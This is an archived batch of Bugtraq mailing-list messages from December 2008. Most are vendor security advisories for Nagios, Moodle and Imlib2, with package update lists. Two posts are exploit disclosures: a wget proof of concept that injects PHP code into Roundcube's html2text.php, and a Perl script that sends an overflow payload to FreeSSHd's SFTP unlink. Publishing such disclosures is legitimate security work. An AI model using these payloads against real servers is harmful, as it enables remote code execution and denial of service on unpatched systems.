iEYEABECAAYFAklPpYAACgkQLMAs/0C4zNqcwQCgkDJMsvCJgTuzMlFJPG8CnDIb
nAUAoLpBqVWH5PMYnkBE5we96ylXYh3v
=/pdt
-----END PGP SIGNATURE-----

--=-dWne1r536o2HA/issnOR--

From - Mon Dec 22 12:59:49 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38998-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 5B847ED200
for <lists@securityspace.com>; Mon, 22 Dec 2008 12:59:30 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 35F9D14398D; Mon, 22 Dec 2008 09:55:15 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31897 invoked from network); 22 Dec 2008 14:20:53 -0000
Subject: [USN-698-2] Nagios3 vulnerabilities
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -4.2
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.69.0.121
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-mYyGRrkIRz8XgQEsC6l+"
Date: Mon, 22 Dec 2008 09:36:42 -0500
Message-Id: <1229956602.23276.9.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.2 
Status:   


--=-mYyGRrkIRz8XgQEsC6l+
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-698-2          December 22, 2008
nagios3 vulnerabilities
CVE-2008-5027, CVE-2008-5028
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  nagios3                         3.0.2-1ubuntu1.1

After a standard system upgrade you need to restart Nagios to effect
the necessary changes.

Details follow:

It was discovered that Nagios was vulnerable to a Cross-site request forgery
(CSRF) vulnerability. If an authenticated nagios user were tricked into
clicking a link on a specially crafted web page, an attacker could trigger
commands to be processed by Nagios and execute arbitrary programs. This
update alters Nagios behaviour by disabling submission of CMD_CHANGE commands.
(CVE-2008-5028)

It was discovered that Nagios did not properly parse commands submitted using
the web interface. An authenticated user could use a custom form or a browser
addon to bypass security restrictions and submit unauthorized commands.
(CVE-2008-5027)


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1.diff.gz
      Size/MD5:    38086 84020bf2660e52ef176a2274971e4c1b
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1.dsc
      Size/MD5:     1644 868828fdabd748689e35083aa052a483
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2.orig.tar.gz
      Size/MD5:  2759331 008d71aac08660bc007f7130ea82ab80

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-common_3.0.2-1ubuntu1.1_all.deb
      Size/MD5:    72216 1cccb3e8640dbd2612caf7841ae1756b
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-doc_3.0.2-1ubuntu1.1_all.deb
      Size/MD5:  2063224 9769666c13c1d886228f66ff40dc729a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_amd64.deb
      Size/MD5:  2660164 381e889f994b102f6e65acc67f032f7a
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_amd64.deb
      Size/MD5:  1538712 8ce98eee89e13bc544180c73c9d24ba0

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_i386.deb
      Size/MD5:  2429130 87889b6dc28b86c4aae3d0acdd9950e9
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_i386.deb
      Size/MD5:  1387398 ec353697aced7539893ef9409d850120

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_lpia.deb
      Size/MD5:  2479724 433504296b1650a7d393ab28d9b264b7
    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_lpia.deb
      Size/MD5:  1376480 be232a1c16b5daff63b586f2cd66b9eb

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_powerpc.deb
      Size/MD5:  2630802 167b533ea10d8962df5bc5904133c067
    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_powerpc.deb
      Size/MD5:  1525154 0679044c20e6a53c9311f2670834035b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3-dbg_3.0.2-1ubuntu1.1_sparc.deb
      Size/MD5:  2327204 f40329c8a8216799a365d185bcc2a646
    http://ports.ubuntu.com/pool/main/n/nagios3/nagios3_3.0.2-1ubuntu1.1_sparc.deb
      Size/MD5:  1379752 04408878bff9de5f485c7da2c6ffde4d



--=-mYyGRrkIRz8XgQEsC6l+
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAklPpfgACgkQLMAs/0C4zNpDNQCghNyH1tzwJKxy8CXSiIIzUXFQ
NHYAoIRdJ1EZWi6MB04DPzzobx3KG9TE
=gM9K
-----END PGP SIGNATURE-----

--=-mYyGRrkIRz8XgQEsC6l+--

From - Mon Dec 22 13:29:48 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f6
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38996-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 63B0DED201
for <lists@securityspace.com>; Mon, 22 Dec 2008 13:20:54 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id EC01914390B; Mon, 22 Dec 2008 09:54:04 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26498 invoked from network); 22 Dec 2008 09:36:24 -0000
Message-ID: <494F6425.1030606@privacy-cd.org>
Date: Mon, 22 Dec 2008 10:55:49 +0100
From: Ubuntu Privacy Remix Team <security_notice@privacy-cd.org>
User-Agent: Thunderbird 2.0.0.18 (X11/20081126)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: [UPRSN] Ubuntu Privacy Remix 8.04r2 introduces "noexec"-mounting
 by default
X-Enigmail-Version: 0.95.0
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit
X-Provags-ID: V01U2FsdGVkX1/hB9Qw9xcQbawgnlOXk4D/AhYEB0KBJFnuVGS
 vKq8+Pmwl8au2ID9JTVNwCLmDZt1Ki/OKbJJsAGge/mewGPjC/
 +/l3obO/TndY4T4+Zexu4rqAZCBnRAPUubI0UnET1aknLRNwLK
 z+A=Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


###########################################################

UPR Security Notice UPRSN-08_02           December 22, 2008

###########################################################

Ubuntu Privacy Remix (UPR), based on Ubuntu 8.04 (LTS), is a live,
read-only CD that seals off your private data from the outside world. It
does this using encryption and isolation methods. This method of booting
off a read-only CD provides a isolated and unmodifiable system that is
exceedingly difficult to compromise by spyware.
The following security issues affect the "Ubuntu Privacy Remix" releases
prior 8.04_r2.

Ubuntu Privacy Remix 8.04_r2 can be downloaded from
https://www.privacy-cd.org/

A. UPR-specific
- ---------------
Removable media is mounted noexec by default
This closes the possibility of infecting the running system with
malicious software
executed from removable media formatted with vfat, ntfs, ext2 or ext3.


B. Security Updates adopted from Ubuntu
- ---------------------------------------
All Ubuntu Updates and Security Updates released since the last
UPR-release until
20081219 are added.
- --

- ---------

Ubuntu Privacy Remix Project
web:            www.privacy-cd.org
mail:            info@privacy-cd.org
bugreports:        https://bugs.launchpad.net/upr
signing_key:        1E8E7D6A | Fingerprint: C87A 673C 4EDD F7CC 5C89
4B77 7AC5 2496 1E8E 7D6A
communication_key:    85AC2E72 | Fingerprint: 83A9 0DE1 17B1 F74B 8E1A
0353 29E6 DD3E 85AC 2E72

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJT2QkKebdPoWsLnIRAj56AKCt9D52BwY75d09dIxd1PpwT59x4gCgiCmC
uobOmTIOk0j3LVbPK9haALo=t73x
-----END PGP SIGNATURE-----

From - Mon Dec 22 13:39:53 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38994-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 2E886ED1A7
for <lists@securityspace.com>; Mon, 22 Dec 2008 13:31:52 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 3CF751438E6; Mon, 22 Dec 2008 09:53:23 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25328 invoked from network); 22 Dec 2008 08:07:50 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <thijs@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
Message-Id: <20081222082717.2D984326E5C@morgana.loeki.tv>
Date: Mon, 22 Dec 2008 09:27:17 +0100 (CET)
From: thijs@debian.org (Thijs Kinkhorst)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-8.68 tagged_above=3.6 required=5.3
tests=[FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1691-1] New moodle packages fix several vulnerabilities
Priority: urgent
Resent-Message-ID: <yT87OARqw1H.A.koC.s90TJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon, 22 Dec 2008 08:27:24 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1691-1                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
December 22, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : moodle
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3555 CVE-2008-1502 CVE-2008-3325 CVE-2008-3326
                 CVE-2008-4796 CVE-2008-4810 CVE-2008-4811 CVE-2008-5432
Debian Bugs    : 432264 471158 489533 492492 504235 504345 508593

Several remote vulnerabilities have been discovered in Moodle, an online
course management system. The following issues are addressed in this
update, ranging from cross site scripting to remote code execution.

Various cross site scripting issues in the Moodle codebase
(CVE-2008-3326, CVE-2008-3325, CVE-2007-3555, CVE-2008-5432,
MSA-08-0021, MDL-8849, MDL-12793, MDL-11414, MDL-14806,
MDL-10276).

Various cross site request forgery issues in the Moodle codebase
(CVE-2008-3325, MSA-08-0023).

Privilege escalation bugs in the Moodle codebase (MSA-08-0001, MDL-7755).

SQL injection issue in the hotpot module (MSA-08-0010).

An embedded copy of Smarty had several vulnerabilities
(CVE-2008-4811, CVE-2008-4810).
An embedded copy of Snoopy was vulnerable to cross site scripting
(CVE-2008-4796).
An embedded copy of Kses was vulnerable to cross site scripting
(CVE-2008-1502).

For the stable distribution (etch), these problems have been fixed in
version 1.6.3-2+etch1.

For the unstable distribution (sid), these problems have been fixed in
version 1.8.2.dfsg-2.

We recommend that you upgrade your moodle (1.6.3-2+etch1) package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch1.diff.gz
    Size/MD5 checksum:    24019 d29c179786ca1dcadf232c5e9a601362
  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3.orig.tar.gz
    Size/MD5 checksum:  7465709 2f9f3fcf83ab0f18c409f3a48e07eae2
  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch1.dsc
    Size/MD5 checksum:      793 d9a1fceaf316b608709be372d97e667a

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch1_all.deb
    Size/MD5 checksum:  6592474 9a5fb5924faa639952c3171665bc347d


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSU9O3Wz0hbPcukPfAQJEwwf9Hw1Rvt1FLIzzB4OsBKS91yaM+lqDwmfu
pi7w5JXmc42AmaoVRCs23LxyqC30qV+vO3ZheYM7qgCZcrdpsWnYCOTy8Var6T0U
hdeE7UeRdlaCMkMEHt505YxNMy7h0Z3HmhZB8ysuSTT9iQ2AAZMeUFJB1MUM/Yf2
8GiQcnIJMcaM8je0M7bjqzSYTA6H8EIuqZZk88FJHhWinMZLWGnKqUoG7cnFfOVd
b0hKY093yf6hNT1pzx5a/a3PaKGjppGtZ+NnaBI8Q7YJvltqBb5lztWXFHuEJCWg
4Oo86NEb8/ARXGxugv0MUFvGPULfMVOTtnvF2BuTZLGZuvprofLy6Q==kHvM
-----END PGP SIGNATURE-----

From - Mon Dec 22 13:49:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38997-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 1D24DED1CF
for <lists@securityspace.com>; Mon, 22 Dec 2008 13:43:13 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E861714393F; Mon, 22 Dec 2008 09:54:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28370 invoked from network); 22 Dec 2008 11:53:57 -0000
Date: Mon, 22 Dec 2008 13:13:32 +0100
From: Jacobo Avariento Gimeno <advisories@sofistic.net>
To: bugtraq@securityfocus.com
Subject: POC for CVE-2008-5619 (roundcubemail PHP arbitrary code injection)
Message-ID: <20081222131332.5253796b@sofistic.net>
Organization: Sofistic
X-Mailer: Claws Mail 3.5.0 (GTK+ 2.12.11; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Status:   


Public Release Date of POC: 2008-12-22
Author: Jacobo Avariento Gimeno (Sofistic)
CVE id: CVE-2008-5619
Bugtraq id: 32799
Severity: Critical
Vulnerability reported by: RealMurphy


Intro
----
Roundcube Webmail is a browser-based IMAP client that uses
"chuggnutt.com HTML to Plain Text Conversion" library to convert
HTML text to plain text, this library uses the preg_replace PHP
function in an insecure manner.

Vulnerable versions:
Round Cube RoundCube Webmail 0.2-3 beta
Round Cube RoundCube Webmail 0.2-1 alpha (tested)


Analysis of the vulnerable code
----
The script bin/html2text.php creates an instance of the class html2text
with the given POST data, the problem arises in the file
program/lib/html2text.php in function _convert() on line 381:

        // Run our defined search-and-replace
        $text = preg_replace($this->search, $this->replace, $text);

Some patterns in $this->search allow interpret PHP code using the "e"
flag, i.e.:
'/<a [^>]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // <a href="">
'/<b[^>]*>(.+?)<\/b>/ie',                // <b>
'/<th[^>]*>(.+?)<\/th>/ie',              // <th> and </th>

In concrete those would be replaced by:
'$this->_build_link_list("\\2", "\\3")', // <a href="">
'strtoupper("\\1")',                    // <b>
"strtoupper(\"\t\t\\1\n\")",            // <th> and </th>

Now using PHP complex (curly) syntax we can take advantage of this to
interpret arbitrary PHP code, evaluating PHP code embedded inside
strings.


Proof of Concept
----
As this vulnerability was discovered in-the-wild:
http://trac.roundcube.net/ticket/1485618 was quite sure that would be
exploitable, using PHP curly we can execute phpinfo():

wget -q --header="Content-Type: ''" \
-O - --post-data='<b>{${phpinfo()}}</b>' \
--no-check-certificate \
http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php

Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc
to avoid using single or double quotes the arbitrary shell command
execution is fully feasible. As this vulnerability was discovered last
week no more details will be published yet, more info will be available
at http://sofistic.net.



-- 
 Jacobo Avariento Gimeno
 IT Security Department @ Sofistic
 Your security, our concern!
 http://sofistic.net

From - Mon Dec 22 14:09:42 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053f9
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38993-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 96108ED202
for <lists@securityspace.com>; Mon, 22 Dec 2008 14:08:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 756411438C2; Mon, 22 Dec 2008 09:53:13 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24939 invoked from network); 22 Dec 2008 07:37:49 -0000
Date: Mon, 22 Dec 2008 00:42:59 -0700
Message-Id: <200812220742.mBM7gxSg003788@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: writ3r-dont-want-bugtraq-spam-@gmail.com
To: bugtraq@securityfocus.com
Subject: FreeSSHd Multiple Remote Stack Overflow Vulnerabilities
Status:   

# FreeSSHd Multiple Remote Stack Overflow Vulnerabilities. 
#
# Version : 1.2.1
# Advisory: http://www.bmgsec.com.au/advisory/42/
#
# Discovered & written by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# After Jeremy Brown reported similar buffer overflow vulnerabilities in
# FreeSSHd I forgot about it, and stopped my research on the vulnerabilities.
# Anyway just now I noticed that other vulnerable functions had not been
# reported. So below is a small list, and a small proof of concept. 

# Note: All below functions overwrite EDI register. 
# open (edi)
# unlink (edi)
# mkdir (edi)
# rmdir (edi)
# stat (edi)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

print $payload;
my $payload = "A" x 5000;

my $sftp = $ssh2->sftp();
$sftp->unlink($payload);

print "[+] Sent";
$ssh2->disconnect;

From - Mon Dec 22 14:29:33 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053fa
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39001-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7D066ED202
for <lists@securityspace.com>; Mon, 22 Dec 2008 14:27:00 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id DCFD91439F0; Mon, 22 Dec 2008 09:55:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31986 invoked from network); 22 Dec 2008 14:20:55 -0000
Subject: [USN-697-1] Imlib2 vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -13.6
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.69.0.167
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-v6PMMMesb4pmaU5XvSBr"
Date: Mon, 22 Dec 2008 09:35:17 -0500
Message-Id: <1229956517.23276.7.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.2 
Status:   


--=-v6PMMMesb4pmaU5XvSBr
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-697-1          December 22, 2008
imlib2 vulnerability
CVE-2008-2426
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libimlib2                       1.2.1-2ubuntu0.4

Ubuntu 7.10:
  libimlib2                       1.3.0.0debian1-4ubuntu0.2

Ubuntu 8.04 LTS:
  libimlib2                       1.4.0-1ubuntu1.2

After a standard system upgrade you need to restart any applications that
use Imlib2 to effect the necessary changes.

Details follow:

It was discovered that Imlib2 did not correctly handle certain malformed XPM
and PNG images. If a user were tricked into opening a specially crafted image
with an application that uses Imlib2, an attacker could cause a denial of
service and possibly execute arbitrary code with the user's privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.4.diff.gz
      Size/MD5:   112004 40358c580aa8df51d351dd6e7f5a16c8
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.4.dsc
      Size/MD5:      753 5420a8a79b55140d8e24db8f2de00dd6
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1.orig.tar.gz
      Size/MD5:   911360 deb3c9713339fe9ca964e100cce42cd1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.4_amd64.deb
      Size/MD5:   352146 b50aee75d96a48b69302db0b41ae17ad
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.4_amd64.deb
      Size/MD5:   214740 b699d7ceafc603c4da9c42325732e076

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.4_i386.deb
      Size/MD5:   302668 ebf21b1c1a22e4802a18c82f59de28e8
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.4_i386.deb
      Size/MD5:   193408 34bfcc6c8dc0986f44e06ec5d7410665

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.4_powerpc.deb
      Size/MD5:   342046 295d87aa13c311a74cd344c0f073af6d
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.4_powerpc.deb
      Size/MD5:   212958 93c174a40fc7d88d48a70f5fdb09a3f5

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.4_sparc.deb
      Size/MD5:   318588 e21dc5553e88054dfd9010cc898181f9
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.4_sparc.deb
      Size/MD5:   194098 fbe1c22aad50c8258c140c67dd85894d

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.2.diff.gz
      Size/MD5:    13769 09820004bae28d3057000445482ef609
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.2.dsc
      Size/MD5:      873 cf5b5d9869202da1a5aa29dbd57b31ab
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1.orig.tar.gz
      Size/MD5:   617750 7f389463afdb09310fa61e5036714bb3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_amd64.deb
      Size/MD5:   365988 53ecdab9240acf9b71e9beb9903ec7fc
